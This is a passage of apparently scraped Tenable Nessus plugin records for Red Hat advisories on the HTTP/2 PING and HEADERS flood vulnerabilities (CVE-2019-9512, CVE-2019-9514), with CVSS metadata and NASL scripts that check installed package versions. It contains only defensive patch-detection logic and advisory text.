link(s) in the References section.\n\nBoth the openshift and atomic-enterprise-service-catalog packages have been rebuilt with updates versions of golang. The golang packages provide the Go programming language compiler.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-11T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : Red Hat OpenShift Container Platform 4.1 openshift RPM (RHSA-2019:2661) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog", "p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog-svcat", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8"], "id": "REDHAT-RHSA-2019-2661.NASL", "href": "https://www.tenable.com/plugins/nessus/128657", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2661. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128657);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2661\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 / 8 : Red Hat OpenShift Container Platform 4.1 openshift RPM (RHSA-2019:2661) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the openshift and atomic-enterprise-service-catalog\npackages is now available for Red Hat OpenShift Container Platform\n4.1.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nBoth the openshift and atomic-enterprise-service-catalog packages have\nbeen rebuilt with updates versions of golang. The golang packages\nprovide the Go programming language compiler.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2661\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-enterprise-service-catalog-svcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x / 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2661\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-enterprise-service-catalog-4.1.14-201908290858.git.1.28cc9ff.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-enterprise-service-catalog-svcat-4.1.14-201908290858.git.1.28cc9ff.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-clients-4.1.14-201908290858.git.0.3bd3467.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-clients-redistributable-4.1.14-201908290858.git.0.3bd3467.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-hyperkube-4.1.14-201908290858.git.0.3bd3467.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openshift-clients-4.1.14-201908290858.git.0.3bd3467.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openshift-clients-redistributable-4.1.14-201908290858.git.0.3bd3467.el8\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"openshift-hyperkube-4.1.14-201908290858.git.0.3bd3467.el8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"atomic-enterprise-service-catalog / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:28:04", "description": "An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Failure trying to conntect to image registry using TLS when buildah is compiled with FIPS mode (BZ#1743169)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-11T00:00:00", "type": "nessus", "title": "RHEL 8 : go-toolset:rhel8 (RHSA-2019:2726) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:go-toolset", "p-cpe:/a:redhat:enterprise_linux:golang", "p-cpe:/a:redhat:enterprise_linux:golang-bin", "p-cpe:/a:redhat:enterprise_linux:golang-docs", "p-cpe:/a:redhat:enterprise_linux:golang-misc", "p-cpe:/a:redhat:enterprise_linux:golang-race", "p-cpe:/a:redhat:enterprise_linux:golang-src", "p-cpe:/a:redhat:enterprise_linux:golang-tests", "cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:enterprise_linux:8.0"], "id": "REDHAT-RHSA-2019-2726.NASL", "href": "https://www.tenable.com/plugins/nessus/128666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:2726. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128666);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2726\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 8 : go-toolset:rhel8 (RHSA-2019:2726) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the go-toolset:rhel8 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Failure trying to conntect to image registry using TLS when buildah\nis compiled with FIPS mode (BZ#1743169)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9512\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-race\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/go-toolset');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module go-toolset:rhel8');\nif ('rhel8' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module go-toolset:' + module_ver);\n\nappstreams = {\n 'go-toolset:rhel8': [\n {'reference':'go-toolset-1.11.13-1.module+el8.0.1+4087+d8180914', 'cpu':'aarch64', 'release':'8'},\n {'reference':'go-toolset-1.11.13-1.module+el8.0.1+4087+d8180914', 'cpu':'s390x', 'release':'8'},\n {'reference':'go-toolset-1.11.13-1.module+el8.0.1+4087+d8180914', 'cpu':'x86_64', 'release':'8'},\n {'reference':'golang-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'aarch64', 'release':'8'},\n {'reference':'golang-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'s390x', 'release':'8'},\n {'reference':'golang-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'x86_64', 'release':'8'},\n {'reference':'golang-bin-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'aarch64', 'release':'8'},\n {'reference':'golang-bin-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'s390x', 'release':'8'},\n {'reference':'golang-bin-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'x86_64', 'release':'8'},\n {'reference':'golang-docs-1.11.13-2.module+el8.0.1+4087+d8180914', 'release':'8'},\n {'reference':'golang-misc-1.11.13-2.module+el8.0.1+4087+d8180914', 'release':'8'},\n {'reference':'golang-race-1.11.13-2.module+el8.0.1+4087+d8180914', 'cpu':'x86_64', 'release':'8'},\n {'reference':'golang-src-1.11.13-2.module+el8.0.1+4087+d8180914', 'release':'8'},\n {'reference':'golang-tests-1.11.13-2.module+el8.0.1+4087+d8180914', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module go-toolset:rhel8');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'go-toolset / golang / golang-bin / etc');\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:30:31", "description": "An update is now available for Red Hat OpenShift Container Platform 4.1.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the cri-o, cri-tools, faq, ignition, openshift-external-storage and pivot RPM packages, which have been rebuilt with an updated version of golang for Red Hat OpenShift Container Platform 4.1.20.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-17T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.1.20 golang (RHSA-2019:3131) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:cri-o", "p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cri-tools", "p-cpe:/a:redhat:enterprise_linux:cri-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:faq", "p-cpe:/a:redhat:enterprise_linux:faq-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ignition", "p-cpe:/a:redhat:enterprise_linux:ignition-validate", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-cephfs-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-manila-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner", "p-cpe:/a:redhat:enterprise_linux:pivot", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8"], "id": "REDHAT-RHSA-2019-3131.NASL", "href": "https://www.tenable.com/plugins/nessus/129995", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3131. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129995);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:3131\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.1.20 golang (RHSA-2019:3131) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat OpenShift Container Platform\n4.1.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nThis advisory contains the cri-o, cri-tools, faq, ignition,\nopenshift-external-storage and pivot RPM packages, which have been\nrebuilt with an updated version of golang for Red Hat OpenShift\nContainer Platform 4.1.20.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:faq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:faq-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ignition\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ignition-validate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-cephfs-provisioner\");\n script_set_attribute(attribute:\"cpe\", 